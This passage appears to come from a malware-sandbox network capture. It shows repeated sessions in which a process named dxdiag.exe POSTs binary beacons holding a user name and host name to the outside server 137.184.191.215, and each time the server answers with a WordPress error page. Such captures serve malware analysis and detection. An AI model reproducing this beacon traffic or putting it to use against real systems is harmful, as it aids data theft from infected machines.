                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.549721137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:16.273866892 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:16.278702021 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:18.942929029 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:16 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:18.942948103 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:18.942965031 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.549722137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:19.092948914 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:19.097881079 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:21.708636999 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:21.708652973 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:21.708663940 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:21.708677053 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.549723137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:21.872013092 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:21.877834082 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:24.486816883 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:22 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:24.486834049 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:24.486845016 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:24.486857891 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.549724137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:24.637128115 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:24.642066956 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:27.344994068 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:25 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:27.345009089 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:27.345020056 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.549725137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:27.494178057 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:27.499222994 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:30.154274940 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:27 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:30.154292107 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:30.154304028 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.549726137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:30.310638905 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:30.316653013 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:32.878415108 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:30 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
